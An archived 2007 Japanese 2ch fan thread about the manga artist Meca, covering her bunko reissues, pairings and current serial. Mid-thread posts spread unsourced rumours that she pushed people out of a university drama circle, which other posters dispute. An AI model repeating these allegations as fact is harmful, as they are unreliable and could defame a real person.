空気など読みません。

ようやくお迎え文庫入手した。
ゆずこ可愛いよゆずこ。
1巻の書き下ろしは、すでにほぼ似た短編があるだけに、あんまり嬉しくなかったなぁ。
だが2巻3巻に期待。ちさっちとなべゆず求む。

175 :花と名無しさん:2007/11/13(火) 01:17:07 ID:???0
>>174
同志よ!
文庫描き下ろしがちさっちの元気に生きている時の話とか
鍋島さんとゆずこの進んだようでまったく進まないほんのり
ラブい話だったらいいなぁ

176 :花と名無しさん:2007/11/13(火) 08:04:38 ID:???0
あくまでも阿熊×ナベシマ派としては複雑でもあり
実際書かれたらほのぼのしそうでもあり

本人はエロス好きかもしれないがほのぼのの方が合ってると思う

177 :花と名無しさん:2007/11/13(火) 15:21:34 ID:???0
>>176
それを言うなら「(自分の好みに)合ってる」じゃないのか

今の作風も好きだけどなぁ

178 :花と名無しさん:2007/11/13(火) 15:37:15 ID:???0
「実は大人なゆずこちゃん」が好きなので
なべゆずと言っても、正に>>175のようなほのぼの・もどかしいものを
更に課長(だっけ?)も絡んで、もどかしさ倍増希望
こんな風に書いちゃうと、実はほのぼのの仮面をかぶったドロドロなのかと思うなw

初期も今も、いつの作風も好きだよ
初期の素朴な絵も好きだが、今の綺麗で整った描線もいい

179 :花と名無しさん:2007/11/13(火) 18:42:12 ID:???O
>>176
自分もナベシマ阿熊派だー
ナベゆずも好きだけど、ゆずこ絡みなら円ちゃんのが面白いw
円ちゃんとちさっちも勿論好き

180 :花と名無しさん:2007/11/16(金) 01:32:51 ID:???0
ひまわりと花火の読みきりが好きな自分はもっと短編を描いて欲しいと思っている
明日お迎え文庫買ってくるノシ

181 :花と名無しさん:2007/11/16(金) 22:02:39 ID:/KA4wUEC0
「セーラー服にお願い」「7時間目ラプソディ」「キスよりも早く」
と手に入れてみんな気に入っているけれど
セーラーと7時間目のラストの回のラストだけが気に入らないのよねえ。
セーラーは、シシの転生後の6歳差になる伏線がどこかに欲しかったし、
名前ぐらい知りたかったなあ。
7時間目は校門出たらってどうよ、それ。
夏休みの蛍の話がよかっただけにちょっとがっかり。
読んでいる最中はいいじゃない〜 と気持ちが盛り上がっていただけに
最後の最後でコケた感じが否めないです。
でも 好きだけど。

182 :花と名無しさん:2007/11/16(金) 22:38:31 ID:???0
アンチがいるだけいいよ
同時に文庫が発売されたはずの岡野史佳スレときたら・・・

183 :花と名無しさん:2007/11/17(土) 01:43:11 ID:???0
>>182
他の漫画家の名前を出すのは良くないよ

文庫の表紙の円ちゃんとゆずこ、可愛かったんだけど
一瞬、男二人の表紙かと思っちゃったよ…

184 :花と名無しさん:2007/11/17(土) 23:36:56 ID:???0
サークル荒らしってホントなのかな・・


185 :花と名無しさん:2007/11/18(日) 01:00:43 ID:???0
文庫の表紙って新しく描いてるんだよね?
買いたいけど、近くの本屋に置いてなかった。
町まで出ないと大きい本屋がない田舎って不便だな…

186 :花と名無しさん:2007/11/18(日) 04:05:53 ID:???0
>>185
通販とか使えば良いのに

187 :花と名無しさん:2007/11/18(日) 13:39:08 ID:???0
>>184
前スレで大学時代に演劇サークルで自分の気に入らない人間を陥れて
追い出したとか
そんなことが関係者から書き込まれていた
結構関係者の生々しい暴露もあって今よりスレに活気があった。
作品の感想ではないところで活気があるのも悲しいが、今のメカさんの
作品レベルじゃあ仕方ないかもね。

188 :花と名無しさん:2007/11/18(日) 14:56:50 ID:???0


49 :花と名無しさん:2007/09/13(木) 04:16:41 ID:???0
>昔メカさんをサイトを作ったりして大プッシュしていた友達がいたけど
なんかもめてなくなったんだよね。お迎えでちょっと売れたから
天狗になっちったとかで

これでがっかりしたな。
作品が良ければいいんだけど、肝心のそれが目も当てられないことに…

189 :花と名無しさん:2007/11/18(日) 15:24:24 ID:???0
>>188
ソースも何も無いようなただの書き込みを鵜呑みにするとか、
自分の阿呆さ加減を露呈してるだけだと思うんだがどうか

190 :花と名無しさん:2007/11/18(日) 15:58:55 ID:???0
確証の無いネタをしつこく書き込むのって気持ち悪い。
確かめようが無いんだから、どうしようもないじゃん。
そんなんで勝手にがっかりしたとかバカじゃないの。

191 :花と名無しさん:2007/11/18(日) 18:54:38 ID:???O
匿名掲示板で確たる証拠もないのにホントよくやるよねw
いい加減見てる方が恥ずかしい

192 :花と名無しさん:2007/11/18(日) 19:25:53 ID:???0
火のないところに煙は立たないとはいうけどね
全くの嘘ともいえないな

193 :花と名無しさん:2007/11/18(日) 19:43:20 ID:???0
お迎え程度で天狗かー・・・・

194 :花と名無しさん:2007/11/18(日) 20:02:21 ID:???0
750 :花と名無しさん:2007/08/16(木) 04:12:14 ID:???0
私もぶっちゃけ関係者だけど私怨厨は関係者なら誰にでもすぐ正体がわかる

前にメカが所属してたサークルで色々ごたごたがあって
追い出された奴が数人いて、その直後にメカがデビューしたから
なんか知らんが「騒動の発端はメカ」「メカが自分を追い出した」とか
言い出す輩が出て、その事吹聴しまわってる奴がいるんだよ。
メカも騒動に加わってどっちかというとそいつらを追い出す側に廻ってたけど
大多数がそうだったからこそ奴らは追い出されたわけだし、
メカは不特定多数の消極的追い出し派の代表になんらかの意図によって勝手にされただけ。
まあ単にデビューした事で名前が知られたせいだと思われる。
奴らが追い出されたのはそういう風にちょっと目立つ奴に徹底的にいやがらせをするせいだったし。

サークル関係のサイト荒らしまくって書きこめなくなったから今度は2chかよ。
サークルとは関係なく本人となにか問題があったにしても、だったらサークルの事持ち出すのは筋じゃない。
メカが前に持ってたサイトに圧力かけたのも私怨厨らしいし、
エスカレートしてこのまま逮捕コースでも取る気か。
私怨厨だけじゃなく他の奴にも迷惑になるからいい加減にしてほしい。

メカすげえ!!!漫画よりおもしれー!!!

195 :花と名無しさん:2007/11/18(日) 23:28:47 ID:???0
正直、その話題もう飽きた

196 :花と名無しさん:2007/11/19(月) 00:22:34 ID:???O
だな
スルーしとこう
相手にするからつけあがるんだし

197 :花と名無しさん:2007/11/19(月) 01:20:47 ID:???0
誰か文庫2巻買った人いる〜?
書き下ろしの内容によっては、購入を考えているんだけど
誰の話かだけ教えてくれないかなぁ。

198 :花と名無しさん:2007/11/19(月) 09:06:15 ID:???0
ファンなら買えよ

199 :花と名無しさん:2007/11/19(月) 14:34:06 ID:???0
買うほどのものじゃないからな

200 :花と名無しさん:2007/11/19(月) 18:42:06 ID:???0
単行本既にもってるとそうなるよなー
貧乏なのです

201 :花と名無しさん:2007/11/20(火) 04:48:51 ID:???0
書き下ろしはちさっちの話

202 :花と名無しさん:2007/11/20(火) 16:40:04 ID:???0
今の連載のネタを誰か振ろうよ・・・・・
タイトルなんだったけw

203 :花と名無しさん:2007/11/20(火) 19:59:56 ID:???0
阿熊さんはやっぱり円ちゃんではなくナベシマさんをひたすら慕ってる時の方が好きだ

204 :花と名無しさん:2007/11/20(火) 21:50:08 ID:???0
今の連載どうでもいいや

205 :花と名無しさん:2007/11/20(火) 22:45:36 ID:???0
漫画の脇役が結構好き。
お迎えだと阿熊さんのおじいちゃんと毛糸のプリンス、天パだとカンジ父、セーラーはテツ君。
キス早はまだ1巻しか読んでないけど、今のところドーナツのヤクザが気になる。

206 :花と名無しさん:2007/11/23(金) 10:52:22 ID:???0
メカさんかわいそうだね。
人気もないし、関係者に嫌われてるし。
今の連載がもうちょっと面白ければよかったのにね

207 :花と名無しさん:2007/11/23(金) 14:54:43 ID:???0
>>206
もういい加減粘着ヤメレ。
「自分の脳内の世界を披露」ウザイ

208 :花と名無しさん:2007/11/23(金) 16:04:16 ID:???0
人気がないのは事実だと思うが
アシスタントに人望がないのかもね

209 :花と名無しさん:2007/11/23(金) 21:47:56 ID:???0
キスを大人気と思うほうが脳内のような…

210 :花と名無しさん:2007/11/23(金) 21:50:19 ID:???0
連載が続いてるのは確かだし、
LaLaなら人気が無ければ打ち切られるのも早いんだから
ある程度人気があるのは確かなんじゃねーの?

誰も「大人気」だなんて主張してないしな

211 :花と名無しさん:2007/11/23(金) 21:53:55 ID:???0
何でそんなに必死なんだ
とりあえず面白くないのを何とかしてくれればいい

212 :花と名無しさん:2007/11/24(土) 21:49:49 ID:???0
必死なのは粘着の方かと

とりあえず連載続けてられる程度には人気なんだろ

213 :花と名無しさん:2007/11/25(日) 09:07:06 ID:???0
何でここメカさんを賞賛しないとすぐアンチとか粘着にされるんだろ
元からのファンだけど最近のメカさんには

214 :花と名無しさん:2007/11/25(日) 17:55:01 ID:???O
変な粘着アンチが前スレでソースもわからないホラ吹いて
散々荒らし回ってたから過敏になるのもわかる

自分はお迎えからのファンで、キス早だけは読めない派だな
ワンパタでつまらんし色気のない無駄なエロを挟むし

215 :花と名無しさん:2007/11/25(日) 18:49:42 ID:???0
周りの人間は

216 :花と名無しさん:2007/11/25(日) 19:07:37 ID:???0
メカの身内がメカの正しさを主張しようとして馬鹿な
書き込みをして自爆したんだよ
こんな身内がいて大変だろうなと同情した
それをアンチに利用されてpgrされてるし
本当に呆れた。
メカはキス早は自分で情けないと思わないんだろうか。
何でもいいから原稿料のために紙を汚しているのか
恥ずかしくはないんだろうか表現する側の人間として

217 :花と名無しさん:2007/11/26(月) 16:35:20 ID:???0
>>216
日本語で頼む

218 :花と名無しさん:2007/11/27(火) 12:01:04 ID:???0
このスレおもしれーな
もっとやれ

219 :花と名無しさん:2007/11/27(火) 18:25:58 ID:???0
>>217
立て読み

220 :花と名無しさん:2007/11/27(火) 18:44:04 ID:???0
文庫2巻は書下ろしある?


221 :花と名無しさん:2007/11/28(水) 00:57:36 ID:???0
>>220
>>201

222 :花と名無しさん:2007/11/28(水) 10:53:29 ID:???0
20前のレスさえ見ようとしないとは

223 :花と名無しさん:2007/11/29(木) 16:06:37 ID:???0
誰も今月のキス早について語ろうとしないね

224 :花と名無しさん:2007/11/29(木) 18:04:39 ID:???0
コミックス派なので語れないな

225 :花と名無しさん:2007/11/29(木) 18:11:40 ID:???0
キス早の話をすると荒れるからな・・・

226 :花と名無しさん:2007/11/29(木) 18:14:08 ID:???0
>>223=225


227 :花と名無しさん:2007/11/29(木) 21:21:14 ID:???0
223だが225さんとは違うよ
ここはなんでも決めつけないと気が済まない人がいるんだね

228 :花と名無しさん:2007/11/30(金) 12:08:57 ID:???0
2chでさん付けって面白いな

229 :花と名無しさん:2007/11/30(金) 17:18:59 ID:???0
揚げ足取るようなことしか話題がないメカオワタ

230 :花と名無しさん:2007/11/30(金) 18:19:13 ID:???0
揚げ足取られて顔真っ赤なメカアンチ

231 :花と名無しさん:2007/11/30(金) 20:09:37 ID:???0
儲vsアンチ ハ ジ マ タ

232 :花と名無しさん:2007/11/30(金) 22:01:48 ID:???0
信者とアンチというより馬鹿と馬鹿の争いじゃね

233 :花と名無しさん:2007/12/01(土) 00:43:38 ID:???0
作品のネタで進まない作家スレも珍しいもんだw

234 :花と名無しさん:2007/12/01(土) 13:08:40 ID:???0
こんな空気で作品のネタなんか出ないだろ('A`)

235 :花と名無しさん:2007/12/01(土) 18:12:31 ID:???0
メカさんはマッチョが大好きなんだ

236 :花と名無しさん:2007/12/01(土) 18:22:16 ID:???0
ムキムキは少女漫画じゃだめなんかね

237 :花と名無しさん:2007/12/01(土) 21:05:01 ID:???0
いけないというわけではないと思うけど
メカさんが描いてもマッチョがマッチョに見えない

238 :花と名無しさん:2007/12/01(土) 21:31:26 ID:???0
マッチョ禁止令出されてるんじゃなかったっけ?


239 :花と名無しさん:2007/12/02(日) 10:26:07 ID:???0
今月のキス早無駄に露出して無駄に筋肉もりもりだったよ

240 :花と名無しさん:2007/12/02(日) 16:00:13 ID:???0
マッチョ禁止令は解禁したんじゃなかった?
セーラーのじいちゃんとか。

241 :花と名無しさん:2007/12/02(日) 16:03:28 ID:???0
露出はあったけどそんなにモリモリではなかった希ガス

242 :花と名無しさん:2007/12/02(日) 19:26:37 ID:???0
たぶんヒーロークラスをマッチョにするのは禁止令だされてると思うw

243 :花と名無しさん:2007/12/02(日) 22:13:38 ID:???0
マッチョすぎる事に悩む女の子の話かけばいいんじゃね?

244 :花と名無しさん:2007/12/03(月) 22:14:16 ID:???0
メカさんの画力じゃ無理でしょ
男の絵もうどんみたいだし…

245 :花と名無しさん:2007/12/03(月) 22:34:31 ID:???0
うどんww

246 :花と名無しさん:2007/12/03(月) 22:38:13 ID:???0
まったくわからないけど斬新な比喩だ

45 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)